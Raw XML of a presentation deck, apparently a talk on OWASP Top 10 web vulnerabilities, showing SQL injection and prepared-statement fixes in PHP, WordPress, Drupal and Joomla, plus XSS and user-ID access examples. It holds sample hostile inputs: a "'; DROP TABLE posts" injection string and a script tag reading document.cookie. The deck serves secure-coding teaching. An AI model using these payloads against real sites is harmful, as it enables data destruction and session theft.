          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4297324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community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produces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freely-available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articles, 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methodologies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technologies in the field of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application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68692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5E90A-564C-4E8E-A690-C8BC2C1035EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="11909791"/>
            <a:ext cx="5992346" cy="805315"/>
            <a:chOff x="528320" y="5257606"/>
            <a:chExt cx="5992346" cy="80531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058EDF-815A-4ADE-B301-01B68AE8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348597-CECD-4F47-B4EB-BE4922D67576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A3E51D9-9E22-4129-B601-878A8B27021B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="526182" y="3179349"/>
            <a:ext cx="7447280" cy="1552172"/>
            <a:chOff x="528320" y="2752929"/>
            <a:chExt cx="7447280" cy="1552172"/>
          </a:xfrm>
        </p:grpSpPr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82B306FC-9DFC-4EA2-897F-7980733D5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09" y="2752929"/>
              <a:ext cx="499452" cy="49945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1CE573-8205-4AF3-8DC7-78B55E8D57FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="3227883"/>
              <a:ext cx="74472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$post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wpdb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query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endPara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wpdb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prepare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endPara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 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"SELECT * FROM posts WHERE title = '</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="007997"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="007997"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="0000E6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>'"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1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$query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r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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0608108-7B2A-4F0B-87EC-DA68C7E8BAFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="526182" y="5212821"/>
            <a:ext cx="8262218" cy="1057436"/>
            <a:chOff x="528319" y="3973730"/>
            <a:chExt cx="8262218" cy="1057436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0B3B98A-7755-4B07-B139-006644C17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286" y="3973730"/>
              <a:ext cx="499452" cy="499452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6E93C8-460F-41CF-9993-1AA01B2CD0B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528319" y="4446391"/>
              <a:ext cx="8262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$query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$connection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query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“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  SELECT * FROM posts WHERE title = :title"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,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[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':title'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=&gt;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$query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])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5D6E6F8-53A1-4489-9275-D4B013DAE843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937073" y="1077308"/>
            <a:ext cx="4493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Parameterized or Prepared SQL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19C700-E5FF-4825-9956-E975ADA12187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="1574567"/>
            <a:ext cx="7590539" cy="1318335"/>
            <a:chOff x="528320" y="1574567"/>
            <a:chExt cx="7590539" cy="1318335"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="Picture 52" descr="A close up of a logo&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4956DB-5D25-4823-B196-F6712E5FC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1574567"/>
              <a:ext cx="499452" cy="4994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5F35BE-842B-430F-A0B9-C3D1865B55E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="2061905"/>
              <a:ext cx="7590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stmt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pdo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prepare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"SELECT * FROM posts WHERE title = :title"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stmt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execute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([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'title'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=&gt;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$query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])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altLang="en-US" sz="16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$post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797997"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="797997"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stmt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-&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="400000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>fetch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()</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="800080"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="16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33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B8752-73C8-4005-94CB-263ED035B555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157533" y="596900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VALIDATE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16552-73C5-4966-8EA9-737BEE579A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541687" y="59690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SANITIZE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03910-85C2-4802-B729-C3D417BA8DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4975661" y="366068"/>
            <a:ext cx="22406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ESCAPE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5E90A-564C-4E8E-A690-C8BC2C1035EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="528320" y="11909791"/>
            <a:ext cx="5992346" cy="805315"/>
            <a:chOff x="528320" y="5257606"/>
            <a:chExt cx="5992346" cy="80531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058EDF-815A-4ADE-B301-01B68AE89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" y="5257606"/>
              <a:ext cx="483406" cy="48340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4348597-CECD-4F47-B4EB-BE4922D67576}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="528320" y="5724367"/>
              <a:ext cx="5992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altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="5F5035"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>field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name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type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text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274796"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>validate</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="808030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E6"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>email</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="16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600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A65700"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="36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5D6E6F8-53A1-4489-9275-D4B013DAE843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937073" y="1077308"/>
            <a:ext cx="44939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Parameterized or Prepared SQL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3E9C0E9C-AAE2-4702-80F8-752D98B3B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1642244"/>
            <a:ext cx="499452" cy="499452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C334B62-452F-48D4-8114-C167B19D8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1" y="3251872"/>
            <a:ext cx="499452" cy="4994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9EB065F-3AEB-44DA-BF24-A6EEEAF2C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6" y="4447793"/>
            <a:ext cx="499452" cy="4994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C45C700-C3F2-41A9-ABDE-320CA5EA8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5874751"/>
            <a:ext cx="483406" cy="483406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FBBE943-7FDF-49F6-8A64-538E692FC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9" y="1642044"/>
            <a:ext cx="482832" cy="55406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D5275B5-FA4C-480E-90BB-D7E465D34C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="2172316"/>
            <a:ext cx="4398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https://php.net/manual/en/book.pdo.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://phpdelusions.net/pdo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://php.net/manual/en/book.mysqli.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p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BAF23A-773F-4C2D-86B7-A898B8009F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="3786847"/>
            <a:ext cx="1041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https://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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896AE72-2B34-4521-A2FF-B2F7F7823B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="4977835"/>
            <a:ext cx="1020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https://www.drupal.org/docs/7/api/database-api/static-queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://www.drupal.org/docs/8/api/database-api/static-queries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C19D04-388D-4913-A2C4-0BD764F1C2BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6520666" y="2172316"/>
            <a:ext cx="5594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https://github.com/mysqljs/mysql#escaping-query-values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00D97-3EE1-47F4-9A02-428AFC4E512A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="6363615"/>
            <a:ext cx="555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4"/>
              </a:rPr>
              <a:t>https://docs.joomla.org/Selecting_data_using_JDatabase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95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69BB7-587D-41C9-BD35-FA0A6400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8361"/>
            <a:ext cx="12374880" cy="12119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5A38E-A980-482A-A991-5AB15C85251E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7565613" y="283881"/>
            <a:ext cx="3722173" cy="124649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latin typeface="Myriad Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9152852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3441692" y="1091068"/>
            <a:ext cx="4811300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D1C7E3-C081-4EB5-B36D-A3A29600FEA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3619298" y="1383652"/>
            <a:ext cx="339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Ayesh’; DROP TABLE posts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D12A496-9609-417E-888C-9A1D9990E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522" y="3368809"/>
            <a:ext cx="7071639" cy="2400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SELECT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FROM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posts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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHERE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title </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="30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30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Ayesh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; DROP TABLE posts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8000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12710-CA39-4D0B-81D3-93CA9CF23F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5045253" y="294205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A89368-DB5B-40F0-B5F6-80AF1656F2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4675909" y="759870"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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E6C5991-8C25-4201-B381-9785A7F7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07D9F9-4323-48C1-A5CB-D5EA4F1C7BA8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6771636" y="2680440"/>
              <a:ext cx="15025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0143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E1644-6DD8-4CF9-9210-DB93B4D906F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111828" y="467593"/>
            <a:ext cx="10089572" cy="904009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1B1AEFB4-4421-45DA-A647-DDBC52C45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24653" y="536865"/>
            <a:ext cx="765463" cy="765463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95686ABC-413E-46AD-AAFD-191991A4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827" y="2385514"/>
            <a:ext cx="1058006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800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var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params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query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endParaRPr lang="en-US" alt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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808030"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Search results for 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query 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0000E6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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800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2800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5400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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474501-198A-4899-A0EB-E1F76D83E1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3887161"/>
            <a:ext cx="9725025" cy="6362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51B1F-B3C2-4950-9F06-331B07039EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1568867" y="4731798"/>
            <a:ext cx="5728578" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:softEdge rad="914400"/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Search results for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1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Ayesh’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50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 talk is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="12700">
                    <a:schemeClr val="tx1">
                      <a:lumMod val="50000"/>
                      <a:lumOff val="50000"/>
                      <a:alpha val="0"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:innerShdw blurRad="1270000" dist="50800" dir="135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a:rPr>
              <a:t>”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415E9A-5E60-4AB5-9424-E1D0D80BEF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25" y="4857750"/>
            <a:ext cx="3228975" cy="1809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C5AA9-246D-4E71-B49C-CB9C7593D09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808310" y="5648670"/>
            <a:ext cx="241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SES_ID = RKKG3-4RHJG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29FEF-9037-4F4A-84DB-585A3761D2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808310" y="5648670"/>
            <a:ext cx="22973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57801-26BC-47AB-A561-708EFFF14155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681316" y="734930"/>
            <a:ext cx="833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Ayesh’s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talk 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&lt;script&gt;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document.cookie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</a:rPr>
              <a:t>&lt;/script&gt;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612CBD-4FD6-4309-9A06-606E72292693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071674" y="734930"/>
            <a:ext cx="40339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747CE-CD59-4D07-BF78-06F87CCD815F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4675909" y="759870"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="378565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C754B68-32D3-43E6-88DC-1EB8B601A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4DB03B-B197-4CA9-975C-1C99113BEAA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6026319" y="2608519"/>
              <a:ext cx="30395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Cross Site Scripting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XSS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2624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2467496" y="1879177"/>
            <a:ext cx="6568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TOP 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3873743637"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push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5117234" y="192617"/>
            <a:ext cx="195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TOP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3D13B-EA9D-4AFC-9495-9A8E2D3BF411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076960" y="1422400"/>
            <a:ext cx="443820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Cross Site Scripting (XSS)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81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62733-3F20-4737-845C-5623D813F364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330960" y="722955"/>
            <a:ext cx="385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https://site.noob/user/796148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60C05-84D4-4F2F-B7D5-E97452A8F6F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1233487" y="1092287"/>
            <a:ext cx="9725025" cy="6732032"/>
            <a:chOff x="1233487" y="1092287"/>
            <a:chExt cx="9725025" cy="67320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4FB9CC-89B9-4D6A-AD3B-83AF3F31B05E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1233487" y="1092287"/>
              <a:ext cx="9725025" cy="6732032"/>
              <a:chOff x="1233487" y="4731798"/>
              <a:chExt cx="9725025" cy="6732032"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Picture 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1AF1594-889C-4A8A-84B8-320F1103B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487" y="5101130"/>
                <a:ext cx="9725025" cy="63627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63E8-7CEA-4F86-B8E4-44C4471A50BC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1568867" y="4731798"/>
                <a:ext cx="5728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7ECAF6-9251-43BD-8D01-197778815787}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2375613" y="2641600"/>
              <a:ext cx="1767840" cy="176784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D38FFE-2D47-4700-9536-346201DF5B99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5567680" y="2879188"/>
              <a:ext cx="4693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  <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>: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Tobias</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/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Birthday: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16/09/1993</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/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Shipping Address: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42,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Foobar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straße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Essen</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" dirty="0"/>
              </a:b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49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4FB9CC-89B9-4D6A-AD3B-83AF3F31B05E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1233487" y="1092287"/>
            <a:ext cx="9725025" cy="6732032"/>
            <a:chOff x="1233487" y="4731798"/>
            <a:chExt cx="9725025" cy="6732032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AF1594-889C-4A8A-84B8-320F1103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87" y="5101130"/>
              <a:ext cx="9725025" cy="63627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BA63E8-7CEA-4F86-B8E4-44C4471A50BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1568867" y="4731798"/>
              <a:ext cx="5728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D62733-3F20-4737-845C-5623D813F364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330960" y="722955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https://site.noob/user/796148/edit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ECAF6-9251-43BD-8D01-197778815787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2375613" y="2641600"/>
            <a:ext cx="1767840" cy="17678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38FFE-2D47-4700-9536-346201DF5B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="2879188"/>
            <a:ext cx="469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en-US" dirty="0"/>
              <a:t>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Tobias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Birthday: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16/09/1993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Shipping Address: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Foobar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straße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Essen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27271-C77F-4C9C-92E9-10B5646B0715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6268720" y="2932310"/>
            <a:ext cx="3992880" cy="247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E8E95-818C-481C-8B34-531C06614F95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512560" y="3221422"/>
            <a:ext cx="3749040" cy="207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86F1A-BEB4-4C68-ABB2-E206D102696F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7386320" y="3518932"/>
            <a:ext cx="2875280" cy="207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87"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:push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D62733-3F20-4737-845C-5623D813F364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330960" y="722955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https://site.noob/user/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23453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D60C05-84D4-4F2F-B7D5-E97452A8F6F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1233487" y="1092287"/>
            <a:ext cx="9725025" cy="6732032"/>
            <a:chOff x="1233487" y="1092287"/>
            <a:chExt cx="9725025" cy="673203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4FB9CC-89B9-4D6A-AD3B-83AF3F31B05E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1233487" y="1092287"/>
              <a:ext cx="9725025" cy="6732032"/>
              <a:chOff x="1233487" y="4731798"/>
              <a:chExt cx="9725025" cy="6732032"/>
            </a:xfrm>
          </p:grpSpPr>
